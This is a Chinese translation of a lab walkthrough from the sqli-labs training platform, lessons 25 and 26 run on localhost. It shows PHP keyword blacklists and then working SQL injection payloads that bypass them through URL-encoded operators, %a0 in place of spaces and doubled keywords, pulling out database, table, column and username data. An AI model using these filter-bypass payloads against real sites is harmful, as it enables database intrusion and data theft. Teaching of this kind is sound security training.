如何手动绕过SQL注入过滤器?
Posted 看雪学院
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了如何手动绕过SQL注入过滤器?相关的知识,希望对你有一定的参考价值。
在前面的文章中(传送门),你应该已经学会了一些关于SQL注入的基本概念,但是在有些情况下,你会发现这些知识竟然不管用了,这是为什么呢?原因就在于开发者采取了一些防止SQL注入的措施。有时,开发者会使用过滤器对用户输入做一些处理,具体来说就是在用户输入被添加到SQL查询语句中之前,将其中的一些字母和操作符剔除,以此来防止SQL注入攻击。本篇文章会帮助你应对此类情况,并教你如何绕过这种过滤器。我们使用的仍然是Dhakkan平台。
本节中,函数OR和AND被过滤掉了,为此,我们要使用它们的替代品来绕过该过滤器。
function blacklist($id)
$id=preg_replace('/OR/i',"",$id); //strip out OR (non case sensitive)
$id=preg_replace('/AND/i',"",$id); //strip out AND (non case sensitive)
替代品:
AND: && %26%26
OR: ||
由于OR,AND被列入黑名单,因此当使用AND 1=1或OR 1=1时就得不到想要的结果了,所以这里换用了 %26%26 。
打开浏览器,输入http://localhost:81/sqli/Less-25/?id=1' %26%26 1=1 --+。(注:具体以个人配置为准)
由上图可以看出,我们使用URL编码 %26%26 成功地解决了AND(&&)被过滤掉的问题。
如果你已经明白了上面的绕过AND过滤器的方法,那么请接着往下看,接下来我们会对该SQL查询语句做一点小小的改动以获取数据库信息。
http://localhost:81/sqli/Less-25/?id=-1' union select 1,2,3 %26%26 1=1 --+
由上图可以看出,显示的是第一列和第二列。
先使用联合注入获取数据库名:
http://localhost:81/sqli/Less-25/?id=-1' union select 1,database(),3 %26%26 1=1 --+
由上图可以看出,数据库名为'security'。
下一条查询来看看数据库中有哪些表:
http://localhost:81/sqli/Less-25/?id=-1' union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema=database() %26%26 1=1 --+
由上图可以看出,当前的表名有:
T1: emails
T2: referers
T3: uagents
T4: users
接着来试找出表users的列名有哪些,使用以下查询:
http://localhost:81/sqli/Less-25/?id=-1' union select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_name='users' %26%26 1=1 --+
由上图可以看出,该表包含了三列,分别是:
C1: id
C2: username
C3: password
在本节的最后,我们使用以下查询看看表users中的username都有哪些:
http://localhost:81/sqli/Less-25/?id=-1' union select 1,group_concat(username),3 from users --+
由上图可以看出,username有Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4。
小结
在第二十五节,我们学习了如何绕过AND和OR过滤器来获取数据库中的信息。
本节延续上一节(传送门)。进入实验室后,你会发现本次面临着比上一回更大的挑战,因为空格、注释、OR和AND全被过滤掉了。不过,和上一回相同,我们还是通过寻找它们的替代品来绕过该过滤器。
function blacklist($id)
$id=preg_replace('/OR/i',"",$id); //strip out OR (non case sensitive)
$id=preg_replace('/AND/i',"",$id); //strip out AND (non case sensitive)
$id=preg_replace('/[/*]/',"",$id); //strip out /*
$id=preg_replace('/[-]/',"",$id); //strip out -
$id=preg_replace('/[#]/',"",$id); //strip out #
$id=preg_replace('/[s]/',"",$id); //strip out space
$id=preg_replace('/[/\\]/',"",$id); //strip out slashes
Blanks=('%09', '%0A', '%0B', '%0C', '%0D', '%a0')
首先打开浏览器,输入http://localhost:81/sqli/Less-26/?id=1'%a0%26%26'1=1(注:具体以个人配置为准)
由上图可以看出,使用URL编码 %a0 我们已经成功地解决了空格的问题。
如果你已经明白了上面的方法,那么接下来,我们会对SQL查询语句做一点小小的改动以获取数据库信息。
http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,2,3%a0%26%26'1=1
由上图可以看出,显示的是第一列和第二列。(注:此图为译者所截,原文此处有误)
还是先获取数据库名:
http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,database(),3%a0%26%26'1=1
由上图可以看出,数据库名为'security'。
接着来看看数据库中有哪些表:
http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,group_concat(table_name),3%a0from%a0infoorrmation_schema.tables%a0where%a0table_schema=database()%a0%26%26'1=1
由上图可以看出,当前的表名有:
T1: emails
T2: referers
T3: uagents
T4: users
接着来看看表users中有哪些列:
http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,group_concat(column_name),3%a0from%a0infoorrmation_schema.columns%a0where%a0table_name='users'%a0%26%26'1=1
由上图可以看出,该表包含了三列,分别是:
C1: id
C2: username
C3: password
在本节的最后,一起来看看表users中的username都有哪些:
http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,group_concat(username),3%a0from%a0users%a0where%a01%26%26%a0'1
由上图可以看出,username有Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4。
小结
在第二十六节,我们学习了如何绕过AND、OR、空格和注释过滤器来获取数据库中的信息。
本文由 看雪翻译小组 hesir 编译,来源 Hacking Articles@Raj Chandel
如果你喜欢的话,不要忘记点个赞哦!
热门阅读文章:
看雪论坛:http://bbs.pediy.com/
微博:看雪安全
商务合作:wsc@kanxue.com
以上是关于如何手动绕过SQL注入过滤器?的主要内容,如果未能解决你的问题,请参考以下文章